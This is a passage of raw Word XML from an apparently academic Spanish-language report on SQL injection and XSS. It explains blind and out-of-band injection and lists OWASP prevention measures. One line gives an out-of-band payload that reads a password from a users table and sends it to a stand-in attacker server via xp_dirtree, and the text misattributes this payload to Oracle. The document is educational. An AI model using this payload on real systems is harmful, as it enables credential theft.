                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inyección a ciegas (Blind SQL Injection)</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opera cuando la aplicación no muestra errores ni cambia visiblemente su comportamiento, pero sigue siendo vulnerable. El atacante utiliza consultas que provocan diferencias sutiles e indirectas en las respuestas. Existen dos subtipos principales: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="209784EE" wp14:editId="6FD36531">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5594" name="Group 5594"/>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210" name="Shape 210"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3623"/>
                                  <a:pt x="46101" y="5688"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11047"/>
                                  <a:pt x="53525" y="14139"/>
                                  <a:pt x="54975" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32362"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43008"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51459"/>
                                  <a:pt x="43011" y="53524"/>
                                  <a:pt x="39510" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53524"/>
                                  <a:pt x="11049" y="51459"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46100"/>
                                  <a:pt x="3625" y="43008"/>
                                  <a:pt x="2175" y="39506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32362"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14139"/>
                                  <a:pt x="5690" y="11047"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5688"/>
                                  <a:pt x="14139" y="3623"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="726"/>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0C47D5" id="Group 5594"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">
                <v:shape id="Shape 210"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" path="m28575,v3789,,7434,726,10935,2174c43011,3623,46101,5688,48781,8368v2679,2679,4744,5771,6194,9270c56425,21138,57150,24785,57150,28575v,3787,-725,7432,-2175,10931c53525,43008,51460,46100,48781,48780v-2680,2679,-5770,4744,-9271,6193c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2177c14139,53524,11049,51459,8369,48780,5690,46100,3625,43008,2175,39506,725,36007,,32362,,28575,,24785,725,21138,2175,17638,3625,14139,5690,11047,8369,8368,11049,5688,14139,3623,17640,2174,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blind SQL Injection basado en contenido</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: El atacante observa si el contenido de la página cambia dependiendo de la veracidad de una condición inyectada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5787EC" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:left="840" w:right="12" w:hanging="270"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BDDF4A0" wp14:editId="2CFE604A">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5595" name="Group 5595"/>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214" name="Shape 214"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="722"/>
                                  <a:pt x="39510" y="2172"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3620"/>
                                  <a:pt x="46101" y="5685"/>
                                  <a:pt x="48781" y="8367"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11046"/>
                                  <a:pt x="53525" y="14136"/>
                                  <a:pt x="54975" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32362"/>
                                  <a:pt x="56425" y="36007"/>
                                  <a:pt x="54975" y="39506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43007"/>
                                  <a:pt x="51460" y="46096"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51454"/>
                                  <a:pt x="43011" y="53519"/>
                                  <a:pt x="39510" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54970"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53519"/>
                                  <a:pt x="11049" y="51454"/>
                                  <a:pt x="8369" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46096"/>
                                  <a:pt x="3625" y="43007"/>
                                  <a:pt x="2175" y="39506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36007"/>
                                  <a:pt x="0" y="32362"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14136"/>
                                  <a:pt x="5690" y="11046"/>
                                  <a:pt x="8369" y="8367"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5685"/>
                                  <a:pt x="14139" y="3620"/>
                                  <a:pt x="17640" y="2172"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="722"/>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E85AFD" id="Group 5595"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">
                <v:shape id="Shape 214"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" path="m28575,v3789,,7434,722,10935,2172c43011,3620,46101,5685,48781,8367v2679,2679,4744,5769,6194,9271c56425,21138,57150,24785,57150,28575v,3787,-725,7432,-2175,10931c53525,43007,51460,46096,48781,48778v-2680,2676,-5770,4741,-9271,6192c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2180c14139,53519,11049,51454,8369,48778,5690,46096,3625,43007,2175,39506,725,36007,,32362,,28575,,24785,725,21138,2175,17638,3625,14136,5690,11046,8369,8367,11049,5685,14139,3620,17640,2172,21141,722,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blind SQL Injection basado en respuesta</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Se analizan pequeñas diferencias en la estructura de la respuesta HTTP, como la presencia de ciertos encabezados o la longitud exacta de la respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322EC7C0" w14:textId="0BDB3E90" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:spacing w:after="318" w:line="318" w:lineRule="auto"/>
        <w:ind w:left="415" w:right="-9" w:hanging="280"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35C0B945" wp14:editId="3D90635C">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5596" name="Group 5596"/>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219" name="Shape 219"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3623"/>
                                  <a:pt x="46101" y="5688"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11047"/>
                                  <a:pt x="53525" y="14139"/>
                                  <a:pt x="54975" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21138"/>
                                  <a:pt x="57150" y="24785"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32362"/>
                                  <a:pt x="56425" y="36009"/>
                                  <a:pt x="54975" y="39509"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43011"/>
                                  <a:pt x="51460" y="46101"/>
                                  <a:pt x="48781" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51457"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57147"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57147"/>
                                  <a:pt x="21141" y="56421"/>
                                  <a:pt x="17640" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="14139" y="53522"/>
                                  <a:pt x="11049" y="51457"/>
                                  <a:pt x="8369" y="48780"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="5690" y="46101"/>
                                  <a:pt x="3625" y="43011"/>
                                  <a:pt x="2175" y="39509"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="725" y="36009"/>
                                  <a:pt x="0" y="32362"/>
                                  <a:pt x="0" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="24785"/>
                                  <a:pt x="725" y="21138"/>
                                  <a:pt x="2175" y="17638"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3625" y="14139"/>
                                  <a:pt x="5690" y="11047"/>
                                  <a:pt x="8369" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11049" y="5688"/>
                                  <a:pt x="14139" y="3623"/>
                                  <a:pt x="17640" y="2174"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21141" y="726"/>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6D38D5" id="Group 5596"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">
                <v:shape id="Shape 219"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" path="m28575,v3789,,7434,726,10935,2174c43011,3623,46101,5688,48781,8368v2679,2679,4744,5771,6194,9270c56425,21138,57150,24785,57150,28575v,3787,-725,7434,-2175,10934c53525,43011,51460,46101,48781,48780v-2680,2677,-5770,4742,-9271,6193c36009,56421,32364,57147,28575,57150v-3789,-3,-7434,-729,-10935,-2177c14139,53522,11049,51457,8369,48780,5690,46101,3625,43011,2175,39509,725,36009,,32362,,28575,,24785,725,21138,2175,17638,3625,14139,5690,11047,8369,8368,11049,5688,14139,3623,17640,2174,21141,726,24786,,28575,xe" fillcolor="black" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,57150,57150"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inyección fuera de banda (Out-of-band)</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: Utiliza funciones específicas del motor de base de datos para transmitir datos a través de canales secundarios cuando el atacante no puede observar directamente los resultados. Por ejemplo, en bases de datos Oracle, la función </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>UTL_HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede usarse para enviar solicitudes HTTP a un servidor controlado por el atacante con datos extraídos de la base de datos: </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">'; DECLARE @data VARCHAR(1024); SELECT @data = (SELECT TOP 1 password FROM users); EXEC master..xp_dirtree '\\attacker-server\share\'+@data; -- </w:t>
      </w:r>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FBC9F7" w14:textId="37CE7717" w:rsidR="00440C91" w:rsidRDefault="00440C91" w:rsidP="00440C91">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc196776202"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MEDIDAS DE PREVENCION</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="07CEA318" w14:textId="77777777" w:rsidR="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440C91">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las medidas de prevención recomendadas por OWASP (2023a) incluyen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78113D" w14:textId="5E5F445E" w:rsidR="00440C91" w:rsidRPr="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="215"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Uso de consultas parametrizadas</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Separar los datos de la lógica SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3A2E4C" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="133" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Implementación de ORM (Object-Relational Mapping)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Abstraer la capa de acceso a datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220EEAFC" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Validación de entrada</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Verificar que los datos ingresados cumplen con el formato esperado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31598310" w14:textId="77777777" w:rsidR="00440C91" w:rsidRPr="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Principio de menor privilegio</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Limitar los permisos de la cuenta de base de datos utilizada por la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205DB85" w14:textId="1D537423" w:rsidR="00440C91" w:rsidRPr="006F0019" w:rsidRDefault="00440C91" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="335"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WAF (Web Application Firewall)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Implementar soluciones de filtrado específicas para SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BB7CB5" w14:textId="37F49A87" w:rsidR="00440C91" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc196776203"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CROSS-SITE SCRIPTING (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="50176B16" w14:textId="11CCBA4F" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc196776204"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DEFINICION Y MECANISMO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="107389AE" w14:textId="13FC4608" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="293"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) es una vulnerabilidad que permite a los atacantes inyectar scripts del lado del cliente, generalmente JavaScript, en páginas web vistas por otros usuarios. Estos scripts se ejecutan en el contexto de seguridad del navegador de la víctima, permitiendo el robo de cookies de sesión, redirecciones a sitios maliciosos o modificación del contenido de la página (Stuttard y Pinto, 2018).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD90336" w14:textId="6D3F915E" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc196776205"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>TIPOS DE XSS Y SUS MECANISMOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="33110F3A" w14:textId="77777777" w:rsidR="006F0019" w:rsidRPr="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="221"/>
        <w:ind w:right="12"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0019">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>De acuerdo con el OWASP (2023b), existen tres tipos principales de ataques XSS, cada uno con mecanismos de funcionamiento distintos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081E988" w14:textId="77777777" w:rsidR="006F0019" w:rsidRDefault="006F0019" w:rsidP="006F0019">
      <w:pPr>
        <w:spacing w:after="49"/>
        <w:ind w:left="420" w:right="12" w:hanging="270"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E4759AD" wp14:editId="12484DE4">
                <wp:extent cx="57150" cy="57150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5600" name="Group 5600"/>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288" name="Shape 288"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="57150" cy="57150"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="57150" h="57150">
                                <a:moveTo>
                                  <a:pt x="28575" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="32364" y="0"/>
                                  <a:pt x="36009" y="726"/>
                                  <a:pt x="39510" y="2177"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43011" y="3625"/>
                                  <a:pt x="46101" y="5686"/>
                                  <a:pt x="48781" y="8368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="51460" y="11047"/>
                                  <a:pt x="53525" y="14139"/>
                                  <a:pt x="54975" y="17636"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="56425" y="21137"/>
                                  <a:pt x="57150" y="24783"/>
                                  <a:pt x="57150" y="28575"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="57150" y="32364"/>
                                  <a:pt x="56425" y="36010"/>
                                  <a:pt x="54975" y="39511"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="53525" y="43011"/>
                                  <a:pt x="51460" y="46100"/>
                                  <a:pt x="48781" y="48778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46101" y="51457"/>
                                  <a:pt x="43011" y="53522"/>
                                  <a:pt x="39510" y="54973"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36009" y="56421"/>
                                  <a:pt x="32364" y="57150"/>
                                  <a:pt x="28575" y="57150"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24786" y="57150"/>
